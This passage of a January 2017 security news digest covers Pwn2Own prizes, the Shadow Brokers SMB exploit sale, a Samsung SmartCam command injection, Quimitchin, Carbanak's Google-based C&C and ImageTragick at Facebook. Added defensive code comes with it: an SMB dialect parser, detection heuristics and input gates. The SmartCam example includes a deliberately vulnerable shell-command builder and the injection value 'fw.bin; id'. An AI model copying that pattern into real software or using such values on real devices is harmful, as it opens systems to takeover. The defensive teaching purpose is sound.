The malware is distributed through an affiliate scheme. The affiliate was initially seen on underground markets as "Simby" until it disappeared in early 2015, reappearing later that year as "Clicool." Once installed, the malware makes the computer browse the Internet on its own in the background.

The new campaign is important, Kafeine says, because the new path added to the EITest compromise chain combines social engineering with the targeting of Chrome users (other paths have been added to EITest before, such as a redirection to an Android "Police" browser locker spotted in December 2014).

“Because actors are finding it more difficult (and therefore less profitable) to achieve conversions (i.e., malware installations) via exploit kit, they are turning to new strategies. As with other threats, actors are exploiting the human factor and are tricking users into loading the malware themselves, this time via selective injects into websites that create the appearance of problems along with the offer of fake solutions,” Proofpoint’s researcher concludes.

Hackers Offered Over $1 Million at Pwn2Own 2017

19.1.2017 Securityweek Hacking

For the 10th anniversary of the Pwn2Own hacking contest, Trend Micro and the Zero Day Initiative (ZDI) have introduced new exploit categories and they are prepared to offer more than $1 million worth of prizes.

Pwn2Own 2017 will take place in mid-March alongside the CanSecWest conference in Vancouver, Canada. Organizers have announced five major categories for the event: virtual machine (VM) escapes, web browsers and plugins, local privilege escalation, enterprise applications, and server side.

VM escapes were first introduced at Pwn2Own 2016 with VMware as the target, but no contestant demonstrated a successful exploit. Researchers did manage to hack VMware Workstation in November at the PwnFest competition in South Korea, earning $150,000.

At this year’s Pwn2Own, experts can earn $100,000 if they manage to execute arbitrary code on the host from a non-admin account in the guest operating system. In addition to VMware Workstation, Microsoft Hyper-V has also been added to the list of targets.

In the web browsers category, Mozilla Firefox has been reintroduced this year and hacking it can earn researchers $30,000. Exploits targeting Microsoft Edge and Google Chrome are worth $80,000, while Apple Safari and Adobe Flash Player exploits are worth $50,000.

Bonuses will be awarded for SYSTEM-level code execution on Windows ($30,000) and Mac OS X ($20,000), and VM escapes ($100,000). The bonuses are cumulative so, for example, if a contestant hacks Chrome, elevates privileges to SYSTEM and escapes the VM, they can earn $210,000 in one go.

Considering that local privilege escalation vulnerabilities can be highly useful for a piece of malware, these types of flaws get their own category this year, with prizes of $30,000 for Windows 10, $20,000 for macOS and $15,000 for Ubuntu Desktop.

The “enterprise applications” category includes Adobe Reader and the Microsoft Office apps Word, Excel and PowerPoint. Hackers can earn $50,000 for vulnerabilities affecting these applications.

The most valuable exploits are in the “server side” category. Hackers can earn $200,000 for successful exploits against Apache Web Server running on Ubuntu Server.

Each exploit will also be rewarded with Master of Pwn points. The contestant with the highest number of total points will receive 65,000 ZDI reward points, which are worth roughly $25,000.

Registration for Pwn2Own 2017 closes on March 12 at 5 PM Pacific Time. Additional information and rules are available on ZDI’s website.

US-CERT – Warning, Shadow Brokers Hackers are offering an SMB Zero-Day exploit
19.1.2017 securityaffairs

The United States Computer Emergency Readiness Team (US-CERT) has issued a warning after the Shadow Brokers hacker group offered to sell what it claims is an SMB zero-day exploit.

The Shadow Brokers is the hacker crew that leaked a portion of the arsenal of the NSA-Linked Equation Group, a database containing hacking tools and exploits.

A few days ago the group announced the sale of an archive of Windows exploits and hacking tools stolen from the Equation Group, apparently putting an end to its failed attempts to auction them off.
While the group claims to be retiring, the stolen exploits remain for sale at a price of 10,000 bitcoins (roughly $8.7 million at the current exchange rate).

The archive also appears to include a zero-day exploit targeting the Server Message Block (SMB) network file sharing protocol.

“In response to public reporting of a potential Server Message Block (SMB) vulnerability, US-CERT is providing known best practices related to SMB. This service is universally available for Windows systems, and legacy versions of SMB protocols could allow a remote attacker to obtain sensitive information from affected systems,” US-CERT said.

Looking closely at the list published by the Shadow Brokers, one entry claims to be an SMB zero-day: a remote code execution exploit offered under the name "SMB cloaked backdoor" for 50 bitcoins. A complete package bundling IIS, RDP, RPC and SMB exploits is priced at 250 bitcoins.

The US-CERT has advised users and administrators to consider disabling SMB v1, and block all versions of SMB at the network boundary. SMB typically uses port 445 (TCP/UDP), ports 137 and 138 (UDP), and port 139 (TCP).

The US-CERT provided the following recommendations to users and administrators:

disable SMB v1; and
block all versions of SMB at the network boundary by blocking TCP port 445, together with the related protocols on UDP ports 137-138 and TCP port 139, on all boundary devices.
Note, however, that disabling or blocking SMB may cause problems by obstructing access to shared files, data, or devices.

“The benefits of mitigation should be weighed against potential disruptions to users. For more information on SMB, please review Microsoft Security Advisories 2696547 and 204279.” continues the advisory.

The US-CERT has issued an alert in response to a Shadow Brokers leak before: in September it warned organizations after the group leaked exploitation tools for flaws affecting Cisco ASA products.
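Before you turn SMBv1 off, the advisory's caveat about disruption means you want to know which clients still negotiate it. The following is an added example, not part of the US-CERT advisory: a parser for the two Negotiate request formats (SMB1 per MS-CIFS and SMB2 per MS-SMB2) that reports the dialects a client offers, so frames captured on TCP 445 can be sorted into SMB1-only clients, SMB1-framed clients that already offer "SMB 2.xxx", and native SMB2/3 clients. The frames it runs on are constructed by the builder functions, not captured traffic.

```python
"""Classify an SMB Negotiate request by the dialects the client offers (added example)."""
import struct

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
SMB1_COM_NEGOTIATE = 0x72
SMB2_NEGOTIATE = 0x0000
SMB2_DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
                 0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}


def strip_netbios(frame: bytes) -> bytes:
    """Drop the 4-byte NetBIOS session header (type 0x00 + 24-bit length) used on TCP 445/139."""
    if len(frame) < 4 or frame[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    length = int.from_bytes(frame[1:4], "big")
    if len(frame) - 4 < length:
        raise ValueError("truncated frame")
    return frame[4:4 + length]


def parse_negotiate(frame: bytes) -> dict:
    """Return protocol, offered dialects and whether the client offers no SMB2 dialect at all."""
    msg = strip_netbios(frame)
    if msg.startswith(SMB1_MAGIC):
        # 32-byte SMB1 header: command is byte 4; WordCount at 32, ByteCount follows the words
        if len(msg) < 35 or msg[4] != SMB1_COM_NEGOTIATE:
            raise ValueError("not an SMB1 Negotiate")
        words_end = 33 + 2 * msg[32]
        (byte_count,) = struct.unpack_from("<H", msg, words_end)
        data = msg[words_end + 2: words_end + 2 + byte_count]
        # each dialect is BufferFormat 0x02 followed by a NUL-terminated ASCII string
        dialects = [d[1:].decode("ascii") for d in data.split(b"\x00") if d.startswith(b"\x02")]
        return {"protocol": "SMB1", "dialects": dialects,
                "smb1_only": not any(d.startswith("SMB 2.") for d in dialects)}
    if msg.startswith(SMB2_MAGIC):
        # 64-byte SMB2 header: StructureSize at offset 4, Command at offset 12
        hdr_size, command = struct.unpack_from("<H6xH", msg, 4)
        if hdr_size != 64 or command != SMB2_NEGOTIATE:
            raise ValueError("not an SMB2 Negotiate")
        # NEGOTIATE request body: StructureSize(36), DialectCount, ..., then 2-byte dialect codes
        struct_size, count = struct.unpack_from("<HH", msg, 64)
        if struct_size != 36:
            raise ValueError("unexpected NEGOTIATE request size")
        codes = struct.unpack_from(f"<{count}H", msg, 64 + 36)
        return {"protocol": "SMB2",
                "dialects": [SMB2_DIALECTS.get(c, f"0x{c:04x}") for c in codes],
                "smb1_only": False}
    raise ValueError("unknown SMB protocol id")


def build_smb1_negotiate(dialects) -> bytes:
    """Constructed SMB1 SMB_COM_NEGOTIATE request in a NetBIOS session header (test input)."""
    header = SMB1_MAGIC + bytes([SMB1_COM_NEGOTIATE]) + b"\x00" * 27   # status..MID zeroed
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    msg = header + b"\x00" + struct.pack("<H", len(data)) + data        # WordCount=0, ByteCount
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


def build_smb2_negotiate(codes) -> bytes:
    """Constructed SMB2 NEGOTIATE request (signing enabled, zero GUID) in a NetBIOS header."""
    header = SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ16s", 64, 0, 0, SMB2_NEGOTIATE,
                                      0, 0, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHHI16s8x", 36, len(codes), 1, 0, 0, b"\x00" * 16)
    body += struct.pack(f"<{len(codes)}H", *codes)
    msg = header + body
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


if __name__ == "__main__":
    for frame in (build_smb1_negotiate(["PC NETWORK PROGRAM 1.0", "NT LM 0.12"]),
                  build_smb1_negotiate(["NT LM 0.12", "SMB 2.002", "SMB 2.???"]),
                  build_smb2_negotiate([0x0202, 0x0210, 0x0311])):
        print(parse_negotiate(frame))
```

A client whose Negotiate is SMB1-framed but lists "SMB 2.002" or "SMB 2.???" will upgrade to SMB2 on its own once the server stops answering SMB1, so only the clients reported as smb1_only need attention before the protocol is disabled. Feed the parser the first client-to-server message of each TCP 445 session from a capture.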

“In August 2016, a group known as “Shadow Brokers” publicly released a large number of files, including exploitation tools for both old and newly exposed vulnerabilities. Cisco ASA devices were found to be vulnerable to the released exploit code. In response, Cisco released an update to address a newly disclosed Cisco ASA Simple Network Management Protocol (SNMP) remote code execution vulnerability (CVE-2016-6366).”

Smile! Hackers Can Remotely Access Your Samsung SmartCam Security Cameras
19.1.2017 thehackernews Hacking
Attackers no longer need to break into your computer or smartphone to spy on you. The devices in our homes are more connected than ever to make our lives easier.
What's worrisome is that these connected devices can be turned against us at any time, because of the weak security measures and insecure cryptography found in many Internet of Things (IoT) devices.
The most recent example is Samsung's range of SmartCam home security cameras.
It is remarkably easy to hijack the popular Samsung SmartCam cameras: they contain a critical remote code execution (RCE) vulnerability that lets attackers gain root access and take full control of the device.
SmartCam is part of Samsung's SmartThings range, which lets users connect, manage, monitor and control "smart" devices in their homes from a smartphone or tablet.

Back in 2014, the hacking group Exploiteers, which was previously known as GTVHacker, listed some SmartCam exploits that could have allowed remote attackers to execute arbitrary commands and let them change the camera's administrator password.
Instead of patching the flaws, Samsung removed the accessible web interface and forced users to manage their SmartCams through the company's SmartCloud website.
Now Exploiteers has broken into Samsung's SmartCam devices again with a different exploit, one that lets attackers view what are supposed to be private video feeds.
What went wrong? Samsung patched the original flaws but left one set of scripts untouched: the PHP scripts that handle firmware updates for the SmartCam's "iWatch" webcam monitoring software.
These scripts contain a command injection vulnerability that allows unauthenticated users, with no admin privileges, to execute shell commands as root.
"The vulnerability occurs because of improper sanitization of the iWatch firmware update filename," a post on Exploiteers website reads. "A specially crafted request allows an attacker the ability to inject his command providing the attacker remote root command execution."
Root access in turn lets an attacker re-enable the web management interface that the vendor had disabled.
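The bug class Exploiteers describe, an update filename spliced into a shell command without sanitization, beside the hardened form, as an added example. This is not Samsung's code and not the camera's PHP; it shows the same pattern in Python. The tar invocation and the staging directory are hypothetical stand-ins for whatever the real update script did; the point is the handling of the filename.

```python
"""Firmware-update filename handling: vulnerable string-built command vs. hardened argv (added example)."""
from __future__ import annotations
import re
import shlex

UPDATE_DIR = "/tmp/fw"   # hypothetical staging directory, not the camera's real path


def build_update_command_vulnerable(filename: str) -> str:
    """The vulnerable pattern: the request's filename lands inside a shell command string unchecked."""
    return f"tar -xzf {UPDATE_DIR}/{filename} -C {UPDATE_DIR}/extract"


def injected_commands(cmd: str) -> list[str]:
    """Tokenise cmd the way /bin/sh would and return the names of any extra commands it contains.

    shlex with punctuation_chars=True splits on ; | & and returns && / || as single tokens.
    """
    tokens = list(shlex.shlex(cmd, posix=True, punctuation_chars=True))
    commands, current = [], []
    for tok in tokens:
        if tok in (";", "&&", "||", "|", "&"):
            commands.append(current)
            current = []
        else:
            current.append(tok)
    commands.append(current)
    return [c[0] for c in commands[1:] if c]


# Allowlist for an update image name: simple basename, bounded length, expected extension.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}\.(?:bin|img)")


def validate_filename(filename: str) -> str:
    """Reject anything that is not a plain image filename: separators, traversal, shell metacharacters."""
    if "/" in filename or "\\" in filename or ".." in filename or not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected update filename: {filename!r}")
    return filename


def is_accepted(filename: str) -> bool:
    try:
        validate_filename(filename)
        return True
    except ValueError:
        return False


def build_update_argv(filename: str) -> list[str]:
    """Hardened form: validated name passed as one argv element to exec, so no shell ever parses it."""
    name = validate_filename(filename)
    return ["tar", "-xzf", f"{UPDATE_DIR}/{name}", "-C", f"{UPDATE_DIR}/extract"]


if __name__ == "__main__":
    evil = "fw.bin; id"
    print(injected_commands(build_update_command_vulnerable(evil)))   # the injected 'id'
    print(build_update_argv("fw-1.2.bin"))
    print(is_accepted(evil))
```

Run the hardened version with subprocess.run(build_update_argv(name)) and never with shell=True. Validation plus argv passing closes the injection; it does not close the other half of the problem the advisory describes, which is that the update scripts were reachable without authentication, so the endpoint still needs an admin session check in front of it.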

Exploiteers has also provided a proof-of-concept video demonstration that shows their exploit successfully working on the SmartCam SNH-1011 model, but security experts believe all Samsung SmartCam devices are affected.
How to Mitigate the Vulnerability?
An official patch from Samsung does not appear to be available yet, but the good news is that the folks at Exploiteers have shared a DIY patch that can be downloaded by SmartCam users.
However, I personally advise users to wait for an official firmware update from the company, rather than running untrusted code on their devices, though there's no indication yet if Samsung has any plan to issue a proper patch in upcoming days.
Another way to mitigate the vulnerability is by keeping your SmartCam behind a network firewall.
Samsung has yet to respond on the issue.

Quimitchin, a Mac backdoor that includes antiquated code
19.1.2017 securityaffairs

Researchers at Malwarebytes have discovered the first Mac malware of 2017, dubbed Quimitchin, that was used against biomedical research institutions.
Security experts have spotted the first Mac malware of 2017, dubbed Quimitchin; it is not considered particularly sophisticated and includes some antiquated code.

According to the researchers from Malwarebytes, the code has been in the wild for several years and was used in targeted attacks against biomedical research institutions.

The Quimitchin spyware was discovered by an IT admin who noticed anomalous traffic from one of the Macs on his network.

The malicious code is composed of only two files:

A .plist file that simply keeps the .client running at all times.
A .client file containing the malicious payload, a minified and obfuscated Perl script.
The payload's main features are screen capture and webcam access.
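A defender's way to hunt for the persistence pair just described (a launchd .plist that keeps a hidden .client running at all times), as an added example that is not Malwarebytes' tooling: it parses a launch item with the standard plistlib module and scores the traits that stand out in this case. The two plists, their labels and the paths in them are constructed, and the two-reason threshold is an assumed triage rule, not a signature.

```python
"""Triage of launchd property lists for the .plist + hidden .client pattern.
Added example; the plists below are constructed and the threshold is a
heuristic chosen for illustration."""
import plistlib
from pathlib import PurePosixPath
from typing import Dict, List, Optional

# Constructed: a launch agent that keeps a hidden script in the home
# directory running at all times (KeepAlive) and starts it at login.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.client</string>
  <key>ProgramArguments</key>
  <array><string>/Users/alice/.client</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

# Constructed: an ordinary helper started at login from an installed app.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.helper</string>
  <key>Program</key><string>/Applications/Example.app/Contents/MacOS/helper</string>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# Locations where launch-item executables are normally expected (assumed list).
TRUSTED_PREFIXES = ("/Applications/", "/System/", "/usr/", "/Library/Apple/")


def launch_item_program(item: dict) -> Optional[str]:
    """launchd runs Program if present, otherwise ProgramArguments[0]."""
    program = item.get("Program")
    if program:
        return program
    args = item.get("ProgramArguments") or []
    return args[0] if args else None


def triage_launch_item(plist_bytes: bytes) -> Dict:
    """Return the label, the executable and the reasons the item looks like
    the Quimitchin persistence pattern; 'suspicious' needs two or more."""
    item = plistlib.loads(plist_bytes)
    program = launch_item_program(item)
    reasons: List[str] = []
    # KeepAlive (true, or a dict of conditions) makes launchd restart the
    # program whenever it exits: "keeps the .client running at all times".
    if item.get("KeepAlive"):
        reasons.append("KeepAlive: restarted whenever it exits")
    if program:
        path = PurePosixPath(program)
        if path.name.startswith("."):
            reasons.append(f"hidden executable name {path.name!r}")
        if not program.startswith(TRUSTED_PREFIXES):
            reasons.append(f"runs from a user-writable location {path.parent}")
    return {
        "label": item.get("Label"),
        "program": program,
        "reasons": reasons,
        "suspicious": len(reasons) >= 2,  # assumed triage threshold
    }


if __name__ == "__main__":
    for name, blob in (("suspect", SUSPECT_PLIST), ("benign", BENIGN_PLIST)):
        result = triage_launch_item(blob)
        print(name, result["program"], result["suspicious"], result["reasons"])
```

On a real system the same function would be run over every file under ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons; the hidden-name and writable-location checks are what separate this case from the many legitimate items that also set KeepAlive.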

“The script also includes some code for taking screen captures via shell commands. Interestingly, it has code to do this both using the Mac “screencapture” command and the Linux “xwd” command. It also has code to get the system’s uptime, using the Mac “uptime” command or the Linux “cat /proc/uptime” command,” reads the analysis published by Malwarebytes.

The malware's ability to exfiltrate data from anything it can access, together with the nature of the targets, biomedical facilities, suggests that the threat actors behind the attacks were conducting a cyber espionage campaign.


Quimitchin uses antiquated system calls, and analysis of its code revealed the use of the open source libjpeg code, which was last updated in 1998.

“These are some truly ancient functions, as far as the tech world is concerned, dating back to pre-OS X days. In addition, the binary also includes the open source libjpeg code, which was last updated in 1998.” continues the analysis.

“The Java class appears to be capable of receiving commands to do various tasks, which include yet another method of capturing the screen, getting the screen size and mouse cursor position, changing the mouse position, simulating mouse clicks, and simulating key presses. This component appears to be intended to provide a kind of rudimentary remote control functionality.”

Experts from Malwarebytes suspect that a Linux variant is also in the wild, because they found Linux shell commands in the scripts.

The security firm also found two Windows executable files that communicated with the same C&C server; in one case the Windows code used the same libjpeg library.

Although Quimitchin is not complex, it has kept working while avoiding detection, much like the EyePyramid code.

Why did code like Quimitchin go undetected for so long?

Experts believe it was used in a limited number of targeted attacks, which is why it was not spotted earlier.

US cancer agency targeted by a singular ransomware attack
19.1.2017 securityaffairs

A new ransomware campaign has targeted the not-for-profit cancer services organisation “Little Red Door” requesting a US$44,000 ransom.
A new ransomware campaign has targeted a not-for-profit cancer services organisation, the Little Red Door. The organization provides a number of cancer support services, including diagnostics and treatment.

The agency's system was infected by ransomware last Wednesday, January 11, 2017, at around 10:00 PM.

According to the Associated Press, the ransomware infected its server and demanded 50 bitcoin (roughly US$44,000) to decrypt the files.


“A ransomware group has infected the computers of an Indiana-based cancer agency and have asked for a large payment of 50 Bitcoin ($44,800).” reported Bleepingcomputer.com.

“The victim is Cancer Services of East Central Indiana-Little Red Door, an organization that helps ‘reduce the financial and emotional burdens of those dealing with a cancer diagnosis.’”

The Little Red Door Executive Director, Aimee Fant, confirmed that the organization's data was stored in unspecified cloud storage.

What makes this ransomware attack unusual is that the crooks demanded the ransom directly from the cancer agency’s staff via phone and email.

“First, they sent text messages to the agency’s Executive Director, President, and Vice President phones, and then they sent a standardized “form letter” via email. The emails contained detailed payment instructions, but also several threats.” added bleepingcomputer.com.

According to the cancer agency’s Executive Director Aimee Fant, the group threatened to contact family members of living and deceased cancer clients, donors and community partners.

The organization, of course, will not pay the ransom because its money has to be used to provide the necessary services to cancer patients and their families.

“The agency will not raise money to pay the criminals’ ransom,” Fant said.

It is a sad story: the organization has no choice but to replace the infected server and keep the old one in the hope that a security firm or law enforcement will recover the decryption keys during their operations.

The agency plans to replace the server with a “secure cloud-based” platform and hopes to have operations restored within the week.

The attack was reported by the organization to the FBI.

The Carbanak gang has a new modus operandi: Google services as C&C
18.1.2017 securityaffairs Crime

The infamous Carbanak cybercrime gang is back and is leveraging Google services for command-and-control of its malicious codes.
The dreaded Carbanak cybercrime gang is back and is adopting a new tactic for its attacks, it is leveraging Google services for command-and-control of its malware.

The criminal organization is known as the Carbanak cybergang after the malware it used to compromise computers at banks and other financial institutions; experts estimate that the hackers stole over $1 billion from their victims.

Most of the gang's financial-institution victims are located in Russia, but attacks have also been detected elsewhere, including Japan, Europe and the United States.

Figure 1 – Map of infections, 2015 attacks against financial institutions (Kaspersky Lab)

The investigators discovered that the “Carbanak cybergang” hit more than 100 financial institutions in 30 countries; it has been active at least since 2013, and there are strong indications that its activity may still be ongoing.

Now researchers from Forcepoint Security Labs have spotted a new campaign conducted by the Carbanak gang that exploits Google’s Apps Script, Sheets, and Forms cloud-based services to control their malicious code.

The attack vector is a trojanized RTF document with an encoded Visual Basic script that is spread via email.

“Forcepoint Security Labs™ recently investigated a trojanized RTF document which we tied to the Carbanak criminal gang. The document contains an encoded Visual Basic Script (VBScript) typical of previous Carbanak malware. Recent samples of the malware have now included the ability to use Google services for command-and-control (C&C) communication. We have notified Google of the abuse and are working with them to share additional information.” reads the analysis published by Forcepoint.

“For each infected user a unique Google Sheets spreadsheet is dynamically created in order to manage each victim. The use of a legitimate third party service like this one gives the attacker the ability to hide in plain sight,” Forcepoint wrote in a blog post today.

The crooks used the “ggldr” script to send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services.

The hackers create a unique Google Sheets spreadsheet for each infected user, which helps them avoid detection.

“The use of a legitimate third party service like this one gives the attacker the ability to hide in plain sight. It is unlikely that these hosted Google services are blocked by default in an organization, so it is more likely that the attacker will establish a C&C channel successfully.” states the report.

The following diagram describes the way the Carbanak cybercrime gang exploited the Google Services as C&C.

Once it has infected the victim’s machine, the malware first attempts to contact the hard-coded Google Apps Script URL with the user’s unique infection ID. Because no spreadsheet yet exists for that victim, the malware then sends two requests to another hard-coded Google Forms URL, which results in the creation of a unique Google Sheets spreadsheet and Google Form IDs for the victim.

The second time the Google Apps Script is requested by the malicious code, the C&C will return the unique Google Sheet and Google Form ID values.

“The “entry” value is also a unique ID which is sent with each subsequent Google Forms C&C request.”
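One way a SOC could hunt for the sequence just described in web proxy logs, as an added example that is not part of the Forcepoint report or its tooling. The hosts script.google.com and docs.google.com are the public Apps Script and Forms endpoints; the log format, the script and form IDs, the victim ID and every sample line are constructed, and both rules are heuristics that need tuning against a baseline of legitimate Forms and Apps Script use in the organization.

```python
"""Hunting for the Google-services C&C sequence in proxy logs.
Added example, not Forcepoint's code: log format, IDs and sample lines are
constructed; the two rules are heuristics, not signatures."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean
from typing import Dict, List

# Constructed proxy log: timestamp source-ip method url
# 10.0.0.5 follows the flow from the report: Apps Script check-in, two
# Forms posts that create the per-victim sheet, then Apps Script polling.
# 10.0.0.9 is a person filling in a form in a browser (loads it, then posts).
SAMPLE_LOG = """\
2017-01-17T09:00:01 10.0.0.5 GET https://script.google.com/macros/s/EXAMPLE_SCRIPT_ID/exec?id=VICTIM-0001
2017-01-17T09:00:02 10.0.0.5 POST https://docs.google.com/forms/d/e/EXAMPLE_FORM_ID/formResponse
2017-01-17T09:00:03 10.0.0.5 POST https://docs.google.com/forms/d/e/EXAMPLE_FORM_ID/formResponse
2017-01-17T09:00:04 10.0.0.5 GET https://script.google.com/macros/s/EXAMPLE_SCRIPT_ID/exec?id=VICTIM-0001
2017-01-17T09:05:00 10.0.0.5 GET https://script.google.com/macros/s/EXAMPLE_SCRIPT_ID/exec?id=VICTIM-0001
2017-01-17T09:10:00 10.0.0.5 GET https://script.google.com/macros/s/EXAMPLE_SCRIPT_ID/exec?id=VICTIM-0001
2017-01-17T09:01:10 10.0.0.9 GET https://docs.google.com/forms/d/e/EXAMPLE_FORM_ID/viewform
2017-01-17T09:01:40 10.0.0.9 POST https://docs.google.com/forms/d/e/EXAMPLE_FORM_ID/formResponse
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+)$")
APPS_SCRIPT_PREFIX = "https://script.google.com/macros/"


def parse_log(text: str) -> List[dict]:
    """Parse the constructed format into events ordered per source by time."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, method, url = m.groups()
            events.append({"ts": datetime.fromisoformat(ts), "src": src,
                           "method": method, "url": url})
    events.sort(key=lambda e: (e["src"], e["ts"]))
    return events


def blind_form_submissions(events: List[dict],
                           window: timedelta = timedelta(minutes=10)) -> Dict[str, int]:
    """Rule 1: formResponse POSTs with no viewform GET from the same source in
    the preceding window. A person loads the form before submitting it; an
    implant posting to a hard-coded Forms URL does not."""
    hits: Dict[str, int] = defaultdict(int)
    last_view: Dict[str, datetime] = {}
    for e in events:
        if e["method"] == "GET" and e["url"].endswith("/viewform"):
            last_view[e["src"]] = e["ts"]
        elif e["method"] == "POST" and e["url"].endswith("/formResponse"):
            seen = last_view.get(e["src"])
            if seen is None or e["ts"] - seen > window:
                hits[e["src"]] += 1
    return dict(hits)


def regular_apps_script_polling(events: List[dict], min_hits: int = 3,
                                max_jitter_s: float = 30) -> Dict[str, int]:
    """Rule 2: one source fetching the same Apps Script URL at least min_hits
    times at a near-constant interval (the per-victim check-in for commands).
    Returns the observed period in seconds for each flagged source."""
    times: Dict[tuple, List[datetime]] = defaultdict(list)
    for e in events:
        if e["url"].startswith(APPS_SCRIPT_PREFIX):
            times[(e["src"], e["url"])].append(e["ts"])
    flagged: Dict[str, int] = {}
    need = min_hits - 1  # number of consecutive gaps that must agree
    for (src, _url), ts in times.items():
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        for i in range(len(gaps) - need + 1):
            run = gaps[i:i + need]
            if max(run) - min(run) <= max_jitter_s:
                flagged[src] = round(mean(run))
                break
    return flagged


def analyze(log_text: str) -> Dict[str, List[str]]:
    """Combine both rules into per-source findings."""
    events = parse_log(log_text)
    findings: Dict[str, List[str]] = defaultdict(list)
    for src, n in blind_form_submissions(events).items():
        findings[src].append(f"{n} Forms submission(s) without loading the form first")
    for src, period in regular_apps_script_polling(events).items():
        findings[src].append(f"regular Apps Script polling, about every {period}s")
    return dict(findings)


if __name__ == "__main__":
    for src, reasons in analyze(SAMPLE_LOG).items():
        print(src, "->", "; ".join(reasons))
```

Neither rule requires blocking Google, which the report notes is rarely done by default; the point is that a legitimate service used as C&C still leaves a behavioural trace (a form submitted without the page ever being loaded, a script URL polled on a timer) that is visible in proxy metadata without inspecting any spreadsheet content.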

Let me suggest reading the report, which also includes the IoCs for this specific threat.

Hacker found a way to hack Facebook by exploiting the ImageMagick flaw
18.1.2017 securityaffairs

The bug hunter Andrew Leonov has described how to exploit an ImageMagick flaw to remotely execute code on a Facebook server.
The hacker Andrew Leonov (@4lemon) has described how to exploit the so-called ImageMagick vulnerability to remotely execute code on a Facebook server.

The ImageMagick flaw, tracked as CVE-2016-3714, affects the popular image manipulation software ImageMagick. It could be exploited to take over websites that rely on the widely used library to resize or crop user-uploaded images, allowing attackers to run arbitrary code on those web servers.

Andrew Leonov (@4lemon), 11:28 AM - 17 Jan 2017:
@Facebook #ImageTragick remote code execution http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html … #RCE #BugBounty
The researcher detailed the attack in a post and also provided a proof-of-concept exploit; Facebook awarded him its highest bug bounty payout to date, US$40,000.

“Once upon a time on Saturday in October I was testing some big service (not Facebook) when some redirect followed me on Facebook. It was a «Share on Facebook» dialog:” wrote Leonov.


“Which many of you could see. If we look closer we can see that a `picture` parameter is a url. But there isn’t image url on page content like mentioned above.” added Leonov.

The expert discovered the vulnerability after a service redirected him to the Facebook platform; initially he was convinced he had found a server-side request forgery vulnerability.

“First of all I thought about some kind of SSRF issue. But tests showed that url from this parameter requested from 31.13.97.* network by facebookexternalhit/1.1.”

After testing the application, the expert devised the following workflow:

Facebook takes the `picture` parameter and requests the URL; this request itself is correct and not vulnerable.
The fetched picture is then passed to a converter instance that used the vulnerable ImageMagick library.
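The step that matters in that workflow is the second one: bytes fetched from a user-controlled URL reach a converter that lets ImageMagick decide the format for itself. The check below is an added example of the mitigation commonly recommended for CVE-2016-3714, placed in front of the converter: decide the format from the leading bytes of the fetched file, never from the URL, extension or Content-Type, and refuse anything that is not one of the raster formats the converter is expected to handle. It is not Facebook's code (the page does not describe Facebook's fix), and the sample inputs are constructed.

```python
"""Content sniffing gate in front of an image converter (added example for
the ImageTragick mitigation; not Facebook's code, sample inputs constructed)."""
from typing import Optional, Tuple

# Leading bytes of the raster formats the converter is allowed to receive.
MAGIC = (
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)


def sniff_image_format(data: bytes) -> Optional[str]:
    """Return the format implied by the file's first bytes, or None."""
    for magic, fmt in MAGIC:
        if data.startswith(magic):
            return fmt
    return None


def accept_for_conversion(data: bytes, declared_ext: str,
                          max_bytes: int = 10_000_000) -> Tuple[bool, str]:
    """Gatekeeper returning (accepted, reason). The declared extension must
    agree with the sniffed format: a text file named .png is refused here,
    whereas ImageMagick would autodetect it and parse it as whatever
    text-based format it resembles."""
    if len(data) > max_bytes:
        return False, "too large"
    fmt = sniff_image_format(data)
    if fmt is None:
        return False, "not a recognised raster image"
    ext = declared_ext.lower().lstrip(".")
    if ext == "jpg":
        ext = "jpeg"
    if ext != fmt:
        return False, f"declared {ext} but content is {fmt}"
    return True, fmt


# Constructed inputs: a PNG header with padding, and the first lines of a
# text-based vector format that carries no image magic at all.
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
MVG_STUB = b"push graphic-context\nviewbox 0 0 640 480\npop graphic-context\n"


if __name__ == "__main__":
    print(accept_for_conversion(PNG_STUB, ".png"))   # accepted as png
    print(accept_for_conversion(MVG_STUB, ".png"))   # refused: no raster magic
    print(accept_for_conversion(PNG_STUB, "jpg"))    # refused: extension mismatch
```

The same gate should run on the bytes actually downloaded by the fetcher, not on the URL that was submitted, because a redirect or a server that lies about Content-Type changes what arrives; restricting the coders ImageMagick may use (its policy.xml) is the complementary, converter-side control.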
Facebook's handling of the report was exemplary: the expert reported the issue through the bug bounty program in October, and the company fixed it in less than three days.

Thai TrueOnline ZyXEL and Billion routers still unpatched since July
18.1.2017 securityaffairs

The security researcher Pedro Ribeiro disclosed several vulnerabilities in the ZyXEL customized routers that could be easily exploited by hackers.
Details on serious vulnerabilities in a number of routers freely distributed by the TrueOnline Thai ISP were published on Monday after private disclosures made to the vendors in July went unanswered.

